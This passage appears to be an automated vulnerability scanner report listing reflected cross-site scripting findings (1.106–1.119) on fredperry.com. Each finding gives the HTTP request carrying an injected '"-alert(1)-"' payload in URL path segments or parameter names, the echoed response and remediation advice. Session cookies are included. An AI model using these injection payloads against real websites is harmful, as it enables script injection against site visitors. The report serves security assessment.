<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons/?SID=2hPWQxiLpIPJPjREOVJiLvolj/gt24Tjf99vflOKNYQ=b6089"-alert(1)-"78f69521811");
//]]>
...[SNIP]...

1.106. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 753ab"-alert(1)-"f5f7eed41f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/collaboration-raf-simons/?753ab"-alert(1)-"f5f7eed41f2=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1r8bdethkco9bag8hd3biug112; expires=Tue, 09-Nov-2010 17:07:43 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons/?753ab"-alert(1)-"f5f7eed41f2=1");
//]]>
...[SNIP]...

1.107. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 979cb"-alert(1)-"bd24e099cfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition979cb"-alert(1)-"bd24e099cfd/men/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b5ovimaq1a269sva272fjhn656; expires=Tue, 09-Nov-2010 17:12:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition979cb"-alert(1)-"bd24e099cfd/men/footwear/");
//]]>
...[SNIP]...

1.108. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bc3d"-alert(1)-"169d283a576 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men7bc3d"-alert(1)-"169d283a576/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=im80s9cq1u9q59qolfhjvgc0a6; expires=Tue, 09-Nov-2010 17:13:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men7bc3d"-alert(1)-"169d283a576/footwear/");
//]]>
...[SNIP]...

1.109. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc2b9"-alert(1)-"be53c83d711 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/footwearbc2b9"-alert(1)-"be53c83d711/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=494opmqoclu78ed6ptci9eaf06; expires=Tue, 09-Nov-2010 17:13:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/footwearbc2b9"-alert(1)-"be53c83d711/");
//]]>
...[SNIP]...

1.110. http://www.fredperry.com/limited-edition/men/footwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e0e7"-alert(1)-"38b1976be02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/footwear/?9e0e7"-alert(1)-"38b1976be02=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ajbvr9uubhd1p5n43a8ciqg5o6; expires=Tue, 09-Nov-2010 17:11:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/footwear/?9e0e7"-alert(1)-"38b1976be02=1");
//]]>
...[SNIP]...

1.111. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87423"-alert(1)-"78a5c0855dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition87423"-alert(1)-"78a5c0855dc/men/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4nuf1et02e07oi73qvqof1qh46; expires=Tue, 09-Nov-2010 17:13:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition87423"-alert(1)-"78a5c0855dc/men/jackets/");
//]]>
...[SNIP]...

1.112. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee837"-alert(1)-"f8707917c46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menee837"-alert(1)-"f8707917c46/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5c1cf8cj9pbs5m5honuqit50q1; expires=Tue, 09-Nov-2010 17:13:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menee837"-alert(1)-"f8707917c46/jackets/");
//]]>
...[SNIP]...

1.113. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94014"-alert(1)-"d16e6883150 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/jackets94014"-alert(1)-"d16e6883150/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4edgddt3us8kdggun3pnup1cu7; expires=Tue, 09-Nov-2010 17:14:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/jackets94014"-alert(1)-"d16e6883150/");
//]]>
...[SNIP]...

1.114. http://www.fredperry.com/limited-edition/men/jackets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91787"-alert(1)-"5d4b3174de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/jackets/?91787"-alert(1)-"5d4b3174de=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ipnrrfroenifcc68853hh96l57; expires=Tue, 09-Nov-2010 17:11:34 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/jackets/?91787"-alert(1)-"5d4b3174de=1");
//]]>
...[SNIP]...

1.115. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dddb"-alert(1)-"34b8e81cc19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition4dddb"-alert(1)-"34b8e81cc19/men/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=n9ra8r0sau1t0h6t9nemlua6p4; expires=Tue, 09-Nov-2010 17:13:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition4dddb"-alert(1)-"34b8e81cc19/men/knitwear/");
//]]>
...[SNIP]...

1.116. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7881"-alert(1)-"0fee6082005 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menf7881"-alert(1)-"0fee6082005/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=of96rkse531fjcp0dee2fp1jp2; expires=Tue, 09-Nov-2010 17:14:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menf7881"-alert(1)-"0fee6082005/knitwear/");
//]]>
...[SNIP]...

1.117. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6277"-alert(1)-"d5b0d20f61b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/knitweard6277"-alert(1)-"d5b0d20f61b/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tf1c4q1115nglm7718ghr1ebl0; expires=Tue, 09-Nov-2010 17:14:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/knitweard6277"-alert(1)-"d5b0d20f61b/");
//]]>
...[SNIP]...

1.118. http://www.fredperry.com/limited-edition/men/knitwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 182cb"-alert(1)-"18aae9e5047 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/knitwear/?182cb"-alert(1)-"18aae9e5047=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d4i4f76btfgd8nphpd8gg1kdc0; expires=Tue, 09-Nov-2010 17:12:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/knitwear/?182cb"-alert(1)-"18aae9e5047=1");
//]]>
...[SNIP]...

1.119. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f33"-alert(1)-"55941b02465 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

